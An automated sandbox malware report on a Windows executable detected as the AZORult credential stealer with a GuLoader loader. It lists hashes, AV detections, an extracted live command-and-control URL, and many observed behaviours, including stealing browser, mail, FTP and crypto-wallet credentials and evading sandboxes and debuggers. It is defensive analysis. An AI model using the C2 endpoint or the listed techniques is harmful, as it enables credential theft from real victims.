Windows Analysis Report 1COK25f1vT.exe

Overview

General Information

Sample Name: 1COK25f1vT.exe
Analysis ID: 542372
MD5: 5918b91ac2931af0267e4af06f3fd2e2
SHA1: 1ce7cccf52a0a569d013c0a91efb4f808c3c6194
SHA256: 41acb7b14d4167374da9039e1324caac71b397bf246abb50cb9ae1ca197b3cc1
Tags: AZORultexe
Infos:

Most interesting Screenshot:

Detection

AZORult GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Yara detected Azorult
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected AZORult Info Stealer
Yara detected Azorult Info Stealer
Detected unpacking (changes PE section rights)
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
Tries to harvest and steal Bitcoin Wallet information
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 12.2.1COK25f1vT.exe.400000.0.unpack Malware Configuration Extractor: Azorult {"C2 url": "http://185.29.11.112/rothchildnew/Panel/index.php"}
Multi AV Scanner detection for submitted file
Source: 1COK25f1vT.exe Virustotal: Detection: 40% Perma Link
Source: 1COK25f1vT.exe ReversingLabs: Detection: 71%
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.1COK25f1vT.exe.1fb10000.1.unpack Avira: Label: TR/Dropper.Gen

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040A610 CryptUnprotectData,LocalFree, 12_2_0040A610

Compliance:

barindex
Uses 32bit PE files
Source: 1COK25f1vT.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 172.217.168.46:443 -> 192.168.2.3:49786 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.3:49787 version: TLS 1.2
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479960511.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491671682.0000000020370000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491651913.000000002036C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479481362.000000001F994000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491786540.00000000203A4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.482100861.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.482084797.000000001F99C000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.12.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: 1COK25f1vT.exe, 0000000C.00000003.484675523.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491908994.000000001F660000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484708142.000000001F9E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp, mozglue.dll.12.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nss3.dll.12.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.12.dr
Source: Binary string: ucrtbase.pdb source: 1COK25f1vT.exe, 0000000C.00000003.489027569.000000001F308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492897666.000000001F85C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489216061.000000001F1EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, ucrtbase.dll.12.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491294897.0000000020314000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.471221878.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.470488936.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.12.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: 1COK25f1vT.exe, 0000000C.00000003.484184430.000000001F9EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp, freebl3.dll.12.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.463561095.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.476648214.000000001F99C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.476666229.000000001F9A0000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479096628.000000001F990000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491786540.00000000203A4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.482506212.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.482100861.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491797103.00000000203A8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.468064054.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491560498.000000002034C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.477468468.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491545056.0000000020348000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.475402246.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.475799639.000000001F998000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.12.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: 1COK25f1vT.exe, 0000000C.00000003.490976694.000000001F304000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489151743.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.493685455.000000001F978000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490948392.000000001F1CC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, vcruntime140.dll.12.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491560498.000000002034C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491604512.0000000020358000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491586380.0000000020354000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491619490.000000002035C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491545056.0000000020348000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.12.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: 1COK25f1vT.exe, 0000000C.00000003.484675523.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491908994.000000001F660000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484708142.000000001F9E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp, mozglue.dll.12.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491294897.0000000020314000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491306740.0000000020318000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491334003.0000000020320000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491319974.000000002031C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.12.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: 1COK25f1vT.exe, 0000000C.00000003.484184430.000000001F9EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp, freebl3.dll.12.dr
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491836442.00000000203BC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491806581.00000000203B4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491826874.00000000203B8000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.481305544.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491748363.0000000020388000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.465766679.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491560498.000000002034C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491604512.0000000020358000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491586380.0000000020354000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.477869582.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.478268008.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491545056.0000000020348000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.478663759.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.12.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr
Source: Binary string: msvcp140.i386.pdb source: 1COK25f1vT.exe, 0000000C.00000003.485203963.000000001F1CC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492268054.000000001F688000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485153671.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, msvcp140.dll.12.dr
Source: Binary string: ucrtbase.pdbUGP source: 1COK25f1vT.exe, 0000000C.00000003.489027569.000000001F308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492897666.000000001F85C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489216061.000000001F1EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, ucrtbase.dll.12.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491806581.00000000203B4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491826874.00000000203B8000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.12.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: 1COK25f1vT.exe, 0000000C.00000003.487119055.000000001F238000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487230327.000000001F364000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nssdbm3.dll.12.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.475799639.000000001F998000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.12.dr
